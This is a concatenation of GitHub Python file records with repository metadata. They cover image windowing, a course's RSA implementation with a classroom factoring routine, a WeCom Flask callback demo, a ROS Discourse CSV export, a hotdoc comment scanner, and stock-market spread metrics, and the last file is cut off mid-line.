description=\"\"\"\n    Type of window. 
Can be blackman, hamming, or hanning.\"\"\"),)\n\n    @ChannelIndependentOperation\n    def run(self, image):\n        # multiply the window by each slice of the image\n        N.multiply(image[:], getWindow(self.win_name, image.idim, image.jdim),\n                   image[:])\n","repo_name":"matthew-brett/recon-tools","sub_path":"root/recon/operations/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"37229800306","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 14 17:06:23 2019\n\n@author: mauro\n\"\"\"\n\nfrom Crypto.Util import number\n\ndef div(x,n):\n    '''\n    Works as follows on the example case div(25,5)\n    First computes the binary repr. of 25, B = [1,1,0,0,1]\n    Then, starting from q,r=0,0 and scanning B from left to right, \n    computes:\n    (0,0) x 2 --> (0,0) --> (0,1) {since B[0]=1}\n    (0,1) x 2 --> (0,2) --> (0,3) {since B[1]=1}\n    (0,3) x 2 --> (0,6)           {since B[2]=0}\n          --> (1,1) {since 6 exceeds 5}\n    (1,1) x 2 --> (2,2)           {since B[3]=0}\n    (2,2) x 2 --> (4,4) --> (4,5) {since B[4]=1}\n          --> (5,0) {since 5 equals 5}\n    \n    '''\n    B = []\n    # We need the bits of x from left to right\n    while x > 0:\n        B.insert(0,x&1)\n        x = x >> 1\n    q,r = 0,0\n    for b in B:\n        q = q << 1\n        r = r << 1\n        if b:\n            r += 1\n        if r>=n:\n            r = r-n\n            q = q+1\n    return q,r\n\ndef modprod(x,y,n):\n    if y==0:\n        return 0\n    q, x = div(x,n) # We are interested in the remainder only\n    q, y = div(y,n)\n    s = 0\n    while y>0:\n        if y&1:\n            q, s = div(s+x,n)\n        q, x = div(x<<1,n)\n        y = y >> 1\n    return s\n\ndef modexp(x,y,n,progress=False):\n    '''\n    Implements the modular exponentiation\n    algorithm: computes x^y mod n (where the\n    symbol ^ denotes raising to a power)\n    '''\n    from math import log2\n    p = 1\n    q, z = div(x,n)\n    while y>0:\n        if progress:\n            print('Approx {} bits of y remain to be processed'.\\\n                  format(int(log2(y))))\n        if y&1:\n            p = modprod(p,z,n)\n        y = y >> 1\n        z = modprod(z,z,n)\n    return p\n\ndef rsakeys(numberofbits=30):\n    p = number.getPrime(numberofbits)\n    q = number.getPrime(numberofbits)\n    n = p*q\n    phi = (p-1)*(q-1)\n    e = 3\n    while number.GCD(e,phi)>1:\n        e+=2\n    d = number.inverse(e,phi)\n    print(p,q)\n    return e,d,n\n\ndef rsaencrypt(M,e,n,progress=False):\n    if number.GCD(M,n)>1:\n        raise ValueError('Not encryptable message')\n    return modexp(M,e,n,progress)\n\ndef rsadecrypt(C,d,n,progress=False):\n    return modexp(C,d,n,progress)\n\ndef commonModAttack(e,d,n):\n    ''' Algorithm (explained in class) to recover the primes p and q\n        given the key pair\n    '''\n    from math import log2\n    r = e*d-1\n    t = 0\n    while not r&1:\n        t += 1\n        r = r >> 1\n    numberOfAttempts = 1\n    while True:\n        g = number.getRandomInteger(int(log2(n)))\n        p = number.GCD(g,n)\n        if p>1:\n            print(\"Hurry up to Vegas? 
It's your lucky day!\")\n return p,div(n,p)[0]\n x = modexp(g,r,n)\n x2 = modprod(x,x,n)\n while x2 != 1:\n x = x2\n x2 = modprod(x,x,n)\n p = number.GCD(x-1,n)\n if p>1:\n print(\"Success after {} attempts\".format(numberOfAttempts))\n return p,div(n,p)[0]\n numberOfAttempts += 1\n \n \n\n\n'''\n(Somewhat simplified) example of Key generation and message\nexchange using the RSA implementation under Crypto modules\n'''\n\n'''\n# Bob's (receiver's) protocol: Key generation\n# Generate the private and public keys\nfrom Crypto.PublicKey import RSA\nkey = RSA.generate(2048)\n# Export the public key to a file\npublicKey = key.publickey().exportKey()\nf = open('BobKey.pem','wb')\nf.write(publicKey)\nf.close()\n# Export the private key to a password protected file\nprivateKey = key.exportKey(passphrase='_A.V3ry.5tr0ng.Pa55w0rd_')\nf = open('rsakey.pem','wb')\nf.write(privateKey)\nf.close()\n\n# Alice's (sender's) protocol: encryption\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Cipher import AES, PKCS1_OAEP \n#OAEP stands for Optimal Asymmetric Encryption Padding\n\n# Prepare the message and import the receiver public key\nmessage = 'Questo è un messaggio di prova'.encode('utf-8')\nBobKey = RSA.importKey(open(\"BobKey.pem\").read())\n# Generate a symmetric key\nsymmetricKey = get_random_bytes(16)\n# Create an object to encrypt under known standard\nrsa = PKCS1_OAEP.new(BobKey)\n# Encrypt the symmetric key using RSA\nrsaEncryptedSymmKey = rsa.encrypt(symmetricKey)\n# Encrypt the message using AES and the symmetric key \nIV = get_random_bytes(16)\naes = AES.new(symmetricKey, AES.MODE_CFB, IV)\nencMessage = IV+aes.encrypt(message)\n# Send the pair formed by the encrypted symmetric key and the\n# encrypted message\ntoBob = (rsaEncryptedSymmKey,encMessage)\n\n# Bob's (receiver's) protocol: decryption\nrsaEncryptedSymmKey,encMessage=toBob\ng = open('rsakey.pem','r')\nkey = g.read()\nprivateKey = RSA.importKey(key,passphrase='_A.V3ry.5tr0ng.Pa55w0rd_')\ng.close()\nrsa = PKCS1_OAEP.new(privateKey)\nsymmetricKey = rsa.decrypt(rsaEncryptedSymmKey)\nIV = encMessage[:16]\naes = AES.new(symmetricKey, AES.MODE_CFB, IV)\ndecryptedMessage = aes.decrypt(encMessage)[16:]\n'''","repo_name":"leoncini/Algoritmi_di_crittografia-2019","sub_path":"RSA.py","file_name":"RSA.py","file_ext":"py","file_size_in_byte":4952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33464569500","text":"\"\"\"\n Flask Demo App\n\"\"\"\nimport time\n\nfrom flask import Flask, request, make_response, jsonify\n\nfrom .ext import wework, wework_msg_validation, wework_msg_xml_parser\n\napp = Flask(__name__)\n\n\n@app.route(\"/wework\", methods=[\"GET\", \"POST\"])\ndef hello():\n if request.method == \"GET\":\n r_sign = request.args.get(\"msg_signature\")\n r_timestamp = request.args.get(\"timestamp\")\n r_nonce = request.args.get(\"nonce\")\n r_echo_str = request.args.get(\"echostr\")\n\n ret, reply_str = wework_msg_validation.verify_url(\n r_sign, r_timestamp, r_nonce, r_echo_str\n )\n if ret != 0:\n print(\"ERR: VerifyURL ret: \" + str(ret))\n return make_response(jsonify({\"msg\": \"error\"}))\n return make_response(reply_str)\n elif request.method == \"POST\":\n r_sign = request.args.get(\"msg_signature\")\n r_timestamp = request.args.get(\"timestamp\")\n r_nonce = request.args.get(\"nonce\")\n r_xml_data = request.data.decode(\"utf-8\")\n\n ret, content = wework_msg_validation.msg_parse(\n r_xml_data, r_sign, r_timestamp, r_nonce\n 
)\n\n if ret != 0:\n print(\"ERR: Decrypt error. ret: \" + str(ret))\n return make_response(jsonify({\"msg\": \"error\"}))\n\n recv_info = wework_msg_xml_parser.parse_message(content)\n print(recv_info)\n\n send_info = wework_msg_xml_parser.build_message(\n \"text\",\n ToUserName=\"xx\",\n FromUserName=\"xx\",\n CreateTime=time.time(),\n Content=\"World\",\n MsgId=1234567890123456,\n AgentID=wework.agent_id,\n )\n ret, con = wework_msg_validation.msg_build(send_info, r_nonce, r_timestamp)\n print(con)\n if ret != 0:\n print(\"ERR: Encrypt error. ret: \" + str(ret))\n return make_response(jsonify({\"msg\": \"error\"}))\n return make_response(con)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=6001)\n","repo_name":"sns-sdks/python-workweixin","sub_path":"examples/flask_demo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20844647071","text":"import csv\nimport json\nfrom itertools import zip_longest\n\nwith open('../data/ros-discourse_data.json') as f:\n rosd_data = json.load(f)\n\nrosd_url = [item.get('url') for item in rosd_data]\nrosd_tcontents = [item.get('thread_contents')\n for item in rosd_data]\nrosd_tdetails = [item.get('thread_details') for item in rosd_data]\nrosd_title = [item.get('title') for item in rosd_data]\nrosd_id = []\nrosd_battery = []\nrosd_energy = []\nrosd_sustain = []\nrosd_power = []\nrosd_green = []\nrosd_tcontents_new = []\nrosd_tdetails_new = []\n\ncollection_name = []\nraw_contents = []\n\nfor i in range(len(rosd_url)):\n y = \"ROSD\" + str(i)\n rosd_id.append(y)\n\nfor i in range(len(rosd_url)):\n collection_name.append(\"ROSDiscourse\")\n\nfor contents in rosd_tcontents:\n contents = ''.join(contents)\n rosd_tcontents_new.append(contents)\n\nfor details in rosd_tdetails:\n try:\n details = ''.join(details)\n rosd_tdetails_new.append(details)\n except TypeError:\n details = ''\n rosd_tdetails_new.append(details)\n\n\n# print(len(rosd_url))\n# print(len(rosd_title))\n# print(len(rosd_tcontents_new))\n# print(len(rosd_tdetails_new))\n\nfor i in range(2604):\n rcontents = rosd_tcontents_new[i] + '' + rosd_tdetails_new[i]\n raw_contents.append(rcontents)\n\nraw_contents_final = []\nfor rc in raw_contents:\n other_string = rc[0:90]\n raw_contents_final.append(other_string)\n\n# print(len(raw_contents))\n\nrosd_list = [rosd_id,\n rosd_url,\n collection_name,\n rosd_title,\n raw_contents_final,\n ]\n\nexport_data = zip_longest(*rosd_list, fillvalue='')\n\nwith open('data/social_discussion.csv', 'a', newline='') as myfile:\n wr = csv.writer(myfile)\n wr.writerows(export_data)\nmyfile.close()\n","repo_name":"S2-group/msr-2021-robotics-green-architectural-tactics-replication-package","sub_path":"RQ1_data_software/phase1_data_collection/data_to_csv/rosd_to_csv.py","file_name":"rosd_to_csv.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25991668795","text":"import collections\nimport os.path\nimport re\n\nfrom hotdoc.core import comment, exceptions\nfrom hotdoc.utils import loggable\nfrom . 
import util\n\n_FIND_COMMENT = re.compile(r'/\\*\\*(.+?)\\*/', re.DOTALL)\n\n_MatchedComment = collections.namedtuple('_MatchedComment',\n ['body', 'start', 'end'])\n\n\nclass _CommentScannerException(exceptions.HotdocSourceException):\n \"\"\"Warnings with which the comment scanner diagnoses stuff that should be\n corrected in the source.\"\"\"\n pass\n\nloggable.Logger.register_warning_code('missing-class-comment',\n _CommentScannerException, 'modular-framework')\nloggable.Logger.register_warning_code('redundant-namespace',\n _CommentScannerException, 'modular-framework')\n\n\ndef _process_line(line):\n \"\"\"Remove leading asterisks from doc comment.\"\"\"\n line = line.strip()\n if line.startswith('* '):\n return line[2:]\n if line == '*':\n return ''\n return line\n\n\ndef _get_comment_bodies(source):\n \"\"\"Iterator, gets verbatim text of all raw comments in source.\"\"\"\n for match in _FIND_COMMENT.finditer(source):\n lines = match.group(1).splitlines()\n lines = map(_process_line, lines)\n\n yield _MatchedComment('\\n'.join(lines).strip(), *match.span(1))\n\n\ndef _demodulize(ident):\n \"\"\"Can't use str.capitalize() for this, because there may be capital\n letters elsewhere in the string.\"\"\"\n return str.upper(ident[0]) + ident[1:]\n\n\ndef _consume_blanks(lines):\n \"\"\"Drop all blank lines from the beginning of an array of lines, and return\n True if there are still any lines left to process.\"\"\"\n while lines and len(lines[0]) == 0:\n lines.pop(0)\n return bool(lines)\n\n\nclass Scanner(loggable.Logger):\n \"\"\"\n Takes care of extracting all the documentation comments from a source file.\n \"\"\"\n\n def _figure_line_number(self, pos):\n \"\"\"Return the line number corresponding to a file position.\"\"\"\n return next(ix for ix, val in enumerate(self._linenos) if pos < val)\n\n def _annotate_from_naturaldocs_comment(self, com):\n \"\"\"Try to put everything specific to the Naturaldocs comment format\n inside this method.\"\"\"\n lines = com.raw_comment.splitlines()\n header_match = re.match(r'(\\w+): (.*)', com.raw_comment)\n if header_match is not None:\n lines.pop(0)\n\n symbol_type, symbol_name = header_match.group(1, 2)\n if symbol_type == 'Class':\n namespace = _demodulize(os.path.basename(\n os.path.dirname(com.filename)))\n com.name = '{}.{}'.format(namespace, symbol_name)\n\n if symbol_name.startswith(namespace + '.'):\n self.warn('redundant-namespace',\n message=('Redundant namespace {} in class comment'\n .format(namespace)),\n filename=com.filename, lineno=com.lineno)\n\n com.title = util.create_text_subcomment(com, com.name)\n self._current_class = com.name\n else:\n if self._current_class is None:\n self.warn('missing-class-comment',\n message='Missing class comment', filename=com.filename,\n lineno=com.lineno)\n\n namespace = _demodulize(os.path.basename(os.path.dirname(\n com.filename)))\n classname = _demodulize(os.path.basename(com.filename[:-3]))\n self._current_class = '{}.{}'.format(namespace, classname)\n\n com.name = '{}:{}'.format(self._current_class, symbol_name)\n com.title = util.create_text_subcomment(com, symbol_name)\n\n if not _consume_blanks(lines):\n return\n\n # One-line description, followed by blank line, followed by more text,\n # means we should treat the one line as a short description\n if len(lines) > 2 and len(lines[1]) == 0:\n com.short_description = util.create_text_subcomment(com,\n lines.pop(0))\n if not _consume_blanks(lines):\n return\n\n com.description = '\\n'.join(lines)\n\n def scan(self, filename):\n \"\"\"\n 
Iterator, yielding `hotdoc.core.comment.Comment` instances based on\n all documentation comments (surrounded by /** */) in a source file.\n\n Args:\n filename (str): Filename to scan\n \"\"\"\n source = ''\n self._linenos = [0]\n\n with open(filename, 'r', encoding='utf-8') as f:\n line = f.readline()\n while line:\n self._linenos.append(f.tell())\n source += line\n line = f.readline()\n\n self._current_class = None\n\n for matched in _get_comment_bodies(source):\n start_line = self._figure_line_number(matched.start)\n end_line = self._figure_line_number(matched.end)\n\n com = comment.Comment(raw_comment=matched.body, filename=filename,\n lineno=start_line, endlineno=end_line)\n\n self._annotate_from_naturaldocs_comment(com)\n\n yield com\n","repo_name":"endlessm/hotdoc-modular-framework","sub_path":"hotdoc_modular_framework/comment_scanner.py","file_name":"comment_scanner.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42644815954","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom datetime import date\r\nimport datetime as dt\r\nfrom datetime import timedelta\r\n\r\no_time = 10 * 60*60 * 1000000\r\nc_time = 16 * 60*60 * 1000000 + 45 * 60 * 1000000\r\ndef metric(filename):\r\n df = pd.read_csv(filename)\r\n df['venue'] = df['#RIC'].str.split('.', expand=True)[1]\r\n df['stock'] = df['#RIC'].str.split('.', expand=True)[0]\r\n # df['timestamp'] = (df['Date[L]'] + df['Time[L]'])\r\n df['timestamp'] = pd.to_datetime(df['Date-Time'], utc=False)\r\n df['timestamp'] = df['timestamp'].dt.tz_localize('UTC').dt.tz_convert('Pacific/Auckland')\r\n df['date'] = df['timestamp'].dt.date\r\n df['time'] = df['timestamp'].dt.time\r\n # df['adj timestamp'] = df['timestamp']-timedelta(hours=13)\r\n # df['adj timestamp'] = df['timestamp']-timedelta(hours=13)\r\n # correct daylight saving\r\n # df['adj timestamp'] = np.where(((df['date']>date(2017,10,1))&(df['date']<=date(2018,3,31)))|(df['date']>date(2018,9,30)), df['adj timestamp']+timedelta(hours=1),df['adj timestamp'])\r\n # df['adj timestamp'] = df['adj timestamp']-timedelta(hours=13)\r\n # correct time\r\n # column went wrong\r\n # df[['Price','Volume','Buyer ID','Seller ID','Qualifiers','Tick Dir.']] = df.groupby(['stock','date'])[['Price','Volume','Buyer ID','Seller ID','Qualifiers','Tick Dir.']].shift(-2)\r\n df['Price'] = df.groupby(['stock', 'date'])['Price'].shift(-2)\r\n df['Volume'] = df.groupby(['stock', 'date'])['Volume'].shift(-2)\r\n df['Buyer ID'] = df.groupby(['stock', 'date'])['Buyer ID'].shift(-2)\r\n df['Seller ID'] = df.groupby(['stock', 'date'])['Seller ID'].shift(-2)\r\n df['Qualifiers'] = df.groupby(['stock', 'date'])['Qualifiers'].shift(-2)\r\n df['Tick Dir.'] = df.groupby(['stock', 'date'])['Tick Dir.'].shift(-2)\r\n\r\n # df.to_csv('ARG_v3.csv')\r\n # df = df[df['Type']=='Quote']\r\n df = df[(df['Price'].notnull()) | (df['Bid Price'].notnull())]\r\n\r\n # for realized spread (hypothetical timeframe)\r\n # df['TS_1m'] = df['adj timestamp'] + timedelta(minutes=1)\r\n\r\n # time in microsecond\r\n df['mtime'] = df['time'].apply(\r\n lambda x: x.hour * 3600 * 1000000 + x.minute * 60 * 1000000 + x.second * 1000000 + x.microsecond)\r\n df['adj mtime'] = np.where(\r\n ((df['date'] > date(2017, 10, 1)) & (df['date'] <= date(2018, 3, 31))) | (df['date'] > date(2018, 9, 30)),\r\n df['mtime'] + 3600 * 1000000, df['mtime'])\r\n df['mtime_1m'] = df['adj mtime'] + 60 * 1000000\r\n df['Ask Size 
abs'] = df['Ask Size']\r\n df['Bid Size abs'] = df['Bid Size']\r\n # fil in quoting status of the previous quote\r\n quotes_cols = ['Bid Price', 'Bid Size', 'Ask Price', 'Ask Size', 'Ask Size abs', 'Bid Size abs']\r\n # df = df.sort_values(['venue', 'extra_timestamp'])\r\n df[quotes_cols] = df.groupby(['venue'])[quotes_cols].fillna(method='ffill')\r\n\r\n df['MidQuote'] = np.where((df['Bid Price'] != 0) & (df['Ask Price'] != 0),\r\n (df['Bid Price'] + df['Ask Price']) / 2.0, np.nan)\r\n\r\n # assign trade direction\r\n\r\n df['direction'] = np.where(df['Price'] > df['MidQuote'], 'B', np.nan)\r\n df['direction'] = np.where(df['Price'] < df['MidQuote'], 'S', df['direction'])\r\n df['direction'] = np.where(df['Price'] == df['MidQuote'], 'C', df['direction'])\r\n df = df[df['Qualifiers']!='SPM[GV4_TEXT]']\r\n # o_time = dt.time(10, 0, 0)\r\n # c_time = dt.time(17, 0, 0)\r\n # df = df[(df['time'] > o_time) & (df['time'] < c_time)]\r\n\r\n\r\n df = df[(df['adj mtime'] > o_time) & (df['adj mtime'] < c_time)]\r\n\r\n # adjust currency\r\n daily_fx = pd.read_csv('C:/Users/anche/NZ/data/daily fx.csv')\r\n daily_fx['date'] = pd.to_datetime(daily_fx['date']).dt.date\r\n daily_fx['midquote'] = pd.to_numeric(daily_fx['midquote'], errors='coerce')\r\n df = df.merge(daily_fx, on=['date'], suffixes=['', '_fx'], how='left')\r\n df['Price'] = df['Price'] * df['midquote']\r\n df['Bid Price'] = df['Bid Price'] * df['midquote']\r\n df['Ask Price'] = df['Ask Price'] * df['midquote']\r\n df['MidQuote'] = df['MidQuote'] * df['midquote']\r\n\r\n # continue other metric\r\n df['value'] = df['Price'] * df['Volume']\r\n df['old fee'] = df['value'].apply(lambda x: min(1 + 0.002 * x, 75))\r\n df['new fee'] = df['value'].apply(lambda x: min(0.0045 * x, 75))\r\n df['fee diff'] = df['new fee'] - df['old fee']\r\n df['fee change'] = df['fee diff'] / ((df['new fee'] + df['old fee']) / 2)\r\n df_trades = df[df['Price'].notnull()]\r\n # per stock per day fee difference\r\n fee_diff = df.groupby(['date', 'stock'])['fee diff'].sum().reset_index()\r\n per_stock_fee_diff = fee_diff.groupby(['stock'])['fee diff'].mean().reset_index()\r\n\r\n fee_change = df.groupby(['date', 'stock'])['fee change'].mean().reset_index()\r\n per_stock_fee_change = fee_change.groupby(['stock'])['fee change'].mean().reset_index()\r\n\r\n df['fee increase'] = np.where(df['new fee'] > df['old fee'], 1, 0)\r\n df['fee decrease'] = np.where(df['new fee'] < df['old fee'], 1, 0)\r\n df['fee unchanged'] = np.where(df['new fee'] == df['old fee'], 1, 0)\r\n df['trades'] = np.where(df['Price'].notnull(), 1, 0)\r\n fee_increase = (df.groupby(['date', 'stock'])['fee increase'].sum() / df.groupby(['date', 'stock'])[\r\n 'trades'].sum()).reset_index()\r\n fee_increase = fee_increase.rename(columns={0: 'perc_fee_increase'})\r\n per_stock_fee_increase = fee_increase.groupby(['stock'])['perc_fee_increase'].mean().reset_index()\r\n daily_value = df.groupby(['date', 'stock'])['value'].sum().reset_index()\r\n daily_value = daily_value.rename(columns={'value': 'daily_value'})\r\n df = df.merge(daily_value, on=['date', 'stock'], how='left')\r\n df['issue'] = np.where(((df['direction'] == 'S') & (df['Price'] < df['Bid Price'])) | (\r\n (df['direction'] == 'B') & (df['Price'] > df['Ask Price'])), 1, 0)\r\n\r\n df['vol_issue'] = np.where(((df['direction'] == 'S') & (df['Volume'] > df['Bid Size abs'])) | (\r\n (df['direction'] == 'B') & (df['Volume'] > df['Ask Size abs'])), 1, 0)\r\n df['quote_alive'] = df.groupby(['stock', 'date'])['adj mtime'].shift(-1) - df['adj mtime']\r\n 
df['quote_alive'] = df['quote_alive'].replace(0, np.nan)\r\n df['quote_alive'] = df['quote_alive'].fillna(method='ffill')\r\n\r\n df['Quoted Spread'] = np.where(\r\n (df['Ask Price'] != 0) & (df['Bid Price'] != 0) & (df['Ask Price'] > df['Bid Price']),\r\n df['Ask Price'] - df['Bid Price'], np.nan)\r\n df['Quoted Spread bps'] = np.where(\r\n (df['Ask Price'] != 0) & (df['Bid Price'] != 0) & (df['Ask Price'] > df['Bid Price']),\r\n (df['Ask Price'] - df['Bid Price']) / (df['MidQuote']), np.nan)\r\n df['Quoted Spread_TW'] = df['Quoted Spread'] * df['quote_alive']\r\n df['Quoted Spread bps_TW'] = df['Quoted Spread bps'] * df['quote_alive']\r\n df[f'at tick'] = np.where(\r\n ((df['Quoted Spread'] < 0.01) & (df['MidQuote'] > 0.2)) | (\r\n (df['Quoted Spread'] < 0.001) & (df['MidQuote'] < 0.2)), 1, 0)\r\n df[f'at tick time'] = df['at tick'] * df['quote_alive']\r\n b_sel = df.direction == 'B'\r\n df.loc[b_sel, f'Effective Spread'] = 2 * (df.loc[b_sel, f'Price'] - df.loc[b_sel, 'MidQuote'])\r\n s_sel = df.direction == 'S'\r\n df.loc[s_sel, f'Effective Spread'] = 2 * (df.loc[s_sel, 'MidQuote'] - df.loc[s_sel, f'Price'])\r\n\r\n df[f'Effective Spread_VW'] = df[f'Effective Spread'] * df[f'value']\r\n df.loc[b_sel, f'Effective Spread bps'] = 2 * (df.loc[b_sel, f'Price'] - df.loc[b_sel, 'MidQuote']) / df.loc[\r\n b_sel, 'MidQuote']\r\n df.loc[s_sel, f'Effective Spread bps'] = 2 * (df.loc[s_sel, 'MidQuote'] - df.loc[s_sel, f'Price']) / df.loc[\r\n s_sel, 'MidQuote']\r\n\r\n df[f'Effective Spread bps_VW'] = df[f'Effective Spread bps'] * df[f'value']\r\n\r\n trade_size = df.groupby(['date', 'stock'])['value'].mean().reset_index()\r\n trade_size = trade_size.rename(columns={'value': 'trade size'})\r\n\r\n Quoted_spread_TW = (df.groupby(['stock', 'date'])['Quoted Spread_TW'].sum() / \\\r\n df.groupby(['stock', 'date'])['quote_alive'].sum()).reset_index()\r\n Quoted_spread_TW = Quoted_spread_TW.rename(columns={0: 'quoted spread'})\r\n\r\n df['MidQuote_TW'] = df['MidQuote'] * df['quote_alive']\r\n\r\n midpoint_TW = (df.groupby(['stock', 'date'])['MidQuote_TW'].sum() / \\\r\n df.groupby(['stock', 'date'])['quote_alive'].sum()).reset_index()\r\n midpoint_TW = midpoint_TW.rename(columns={0: 'midpoint'})\r\n Quoted_spread_bps_TW = (df.groupby(['stock', 'date'])['Quoted Spread bps_TW'].sum() / \\\r\n df.groupby(['stock', 'date'])['quote_alive'].sum()).reset_index()\r\n Quoted_spread_bps_TW = Quoted_spread_bps_TW.rename(columns={0: 'quoted spread bps'})\r\n\r\n min_tick_TW = (df.groupby(['stock', 'date'])['at tick time'].sum() / \\\r\n df.groupby(['stock', 'date'])[\r\n 'quote_alive'].sum()).reset_index()\r\n min_tick_TW = min_tick_TW.rename(columns={0: 'tick time'})\r\n\r\n Value_weighted_Effective_Spread = (df.groupby(['stock', 'date'])['Effective Spread_VW'].sum() / \\\r\n df[df['Effective Spread_VW'].notnull()].groupby(['stock', 'date'])[\r\n 'value'].sum()).reset_index()\r\n Value_weighted_Effective_Spread = Value_weighted_Effective_Spread.rename(\r\n columns={0: 'value weighted effective spread'})\r\n\r\n Value_weighted_Effective_Spread_bps = ((df.groupby(['stock', 'date'])['Effective Spread bps_VW'].sum() / \\\r\n df[df['Effective Spread bps_VW'].notnull()].groupby(['stock', 'date'])[\r\n 'value'].sum()) * 10000).reset_index()\r\n Value_weighted_Effective_Spread_bps = Value_weighted_Effective_Spread_bps.rename(\r\n columns={0: 'value weighted effective spread bps'})\r\n\r\n # realized spread\r\n df = df.sort_values('adj mtime', ascending=True)\r\n df_realized = pd.merge_asof(df, df[['stock', 'date', 'adj 
mtime', 'MidQuote']], left_on=['mtime_1m'],\r\n right_on=['adj mtime'],\r\n by=['stock', 'date'], suffixes=('', '_1m_matched'),\r\n allow_exact_matches=False)\r\n\r\n b_sel = df_realized.direction == 'B'\r\n df_realized.loc[b_sel, f'Realized Spread'] = 2 * (\r\n df_realized.loc[b_sel, f'Price'] - df_realized.loc[b_sel, 'MidQuote_1m_matched'])\r\n s_sel = df_realized.direction == 'S'\r\n df_realized.loc[s_sel, f'Realized Spread'] = 2 * (\r\n df_realized.loc[s_sel, 'MidQuote_1m_matched'] - df_realized.loc[s_sel, f'Price'])\r\n\r\n df_realized[f'Realized Spread_VW'] = df_realized[f'Realized Spread'] * df_realized[f'value']\r\n df_realized.loc[b_sel, f'Realized Spread bps'] = 2 * (\r\n df_realized.loc[b_sel, f'Price'] - df_realized.loc[b_sel, 'MidQuote_1m_matched']) / df_realized.loc[\r\n b_sel, 'MidQuote_1m_matched']\r\n df_realized.loc[s_sel, f'Realized Spread bps'] = 2 * (\r\n df_realized.loc[s_sel, 'MidQuote_1m_matched'] - df_realized.loc[s_sel, f'Price']) / df_realized.loc[\r\n s_sel, 'MidQuote_1m_matched']\r\n\r\n df_realized[f'Realized Spread bps_VW'] = df_realized[f'Realized Spread bps'] * df_realized[f'value']\r\n\r\n Value_weighted_Realized_Spread = (df_realized.groupby(['stock', 'date'])['Realized Spread_VW'].sum() / \\\r\n df_realized[df_realized['Realized Spread_VW'].notnull()].groupby(\r\n ['stock', 'date'])['value'].sum()).reset_index()\r\n\r\n Value_weighted_Realized_Spread = Value_weighted_Realized_Spread.rename(\r\n columns={0: 'value weighted realized spread'})\r\n\r\n Value_weighted_Realized_Spread_bps = ((df_realized.groupby(['stock', 'date'])['Realized Spread bps_VW'].sum() / \\\r\n df_realized[df_realized['Realized Spread bps_VW'].notnull()].groupby(\r\n ['stock', 'date'])['value'].sum()) * 10000).reset_index()\r\n Value_weighted_Realized_Spread_bps = Value_weighted_Realized_Spread_bps.rename(\r\n columns={0: 'value weighted realized spread bps'})\r\n\r\n # compute market order\r\n market_order = df.groupby(['stock', 'date', 'adj mtime'])['value'].sum().reset_index()\r\n\r\n daily_market_order = market_order.groupby(['stock', 'date'])['value'].mean().reset_index()\r\n daily_market_order = daily_market_order.rename(columns={'value': 'market order value'})\r\n\r\n # compute price order\r\n\r\n df['bid diff'] = df.groupby(['stock', 'venue', 'date'])['Bid Price'].diff()\r\n df['bid order'] = np.where(df['bid diff'] == 0, df.groupby(['stock', 'venue', 'date'])['Bid Size abs'].diff(),\r\n np.nan)\r\n df['bid order'] = np.where(df['bid diff'] > 0, df['Bid Size abs'], df['bid order'])\r\n\r\n df['bid order'] = np.where(df['bid order'] > 0, df['bid order'], np.nan)\r\n\r\n df['ask diff'] = df.groupby(['stock', 'venue', 'date'])['Ask Price'].diff()\r\n df['ask order'] = np.where(df['ask diff'] == 0, df.groupby(['stock', 'venue', 'date'])['Ask Size abs'].diff(),\r\n np.nan)\r\n df['ask order'] = np.where(df['ask diff'] < 0, df['Ask Size abs'], df['ask order'])\r\n df['ask order'] = np.where(df['ask order'] > 0, df['ask order'], np.nan)\r\n\r\n daily_bid_order = df.groupby(['stock', 'date'])['bid order'].mean().reset_index()\r\n daily_bid_order = daily_bid_order.rename(columns={'bid order': 'bid order value'})\r\n\r\n daily_ask_order = df.groupby(['stock', 'date'])['ask order'].mean().reset_index()\r\n daily_ask_order = daily_ask_order.rename(columns={'ask order': 'ask order value'})\r\n\r\n daily_order = daily_bid_order.merge(daily_ask_order, on=['stock', 'date'])\r\n\r\n num_quote_update = df.groupby(['stock', 'date'])['Bid Price'].count().reset_index()\r\n num_quote_update = 
num_quote_update.rename(columns={'Bid Price': 'num_quote_update'})\r\n\r\n num_trades = df.groupby(['stock', 'date'])['Price'].count().reset_index()\r\n num_trades = num_trades.rename(columns={'Price': 'num_trades'})\r\n fee_diff['date'] = pd.to_datetime(fee_diff['date'])\r\n fee_change['date'] = pd.to_datetime(fee_change['date'])\r\n fee_increase['date'] = pd.to_datetime(fee_increase['date'])\r\n daily_value['date'] = pd.to_datetime(daily_value['date'])\r\n Quoted_spread_TW['date'] = pd.to_datetime(Quoted_spread_TW['date'])\r\n\r\n min_tick_TW['date'] = pd.to_datetime(min_tick_TW['date'])\r\n Value_weighted_Effective_Spread['date'] = pd.to_datetime(Value_weighted_Effective_Spread['date'])\r\n Value_weighted_Effective_Spread_bps['date'] = pd.to_datetime(Value_weighted_Effective_Spread_bps['date'])\r\n Value_weighted_Realized_Spread['date'] = pd.to_datetime(Value_weighted_Realized_Spread['date'])\r\n Value_weighted_Realized_Spread_bps['date'] = pd.to_datetime(Value_weighted_Realized_Spread_bps['date'])\r\n daily_market_order['date'] = pd.to_datetime(daily_market_order['date'])\r\n daily_order['date'] = pd.to_datetime(daily_order['date'])\r\n num_quote_update['date'] = pd.to_datetime(num_quote_update['date'])\r\n num_trades['date'] = pd.to_datetime(num_trades['date'])\r\n midpoint_TW['date'] = pd.to_datetime(midpoint_TW['date'])\r\n\r\n all_metric = fee_diff.merge(fee_change, on=['stock', 'date'], how='outer').merge(fee_increase, on=['stock', 'date'],\r\n how='outer')\r\n all_metric = 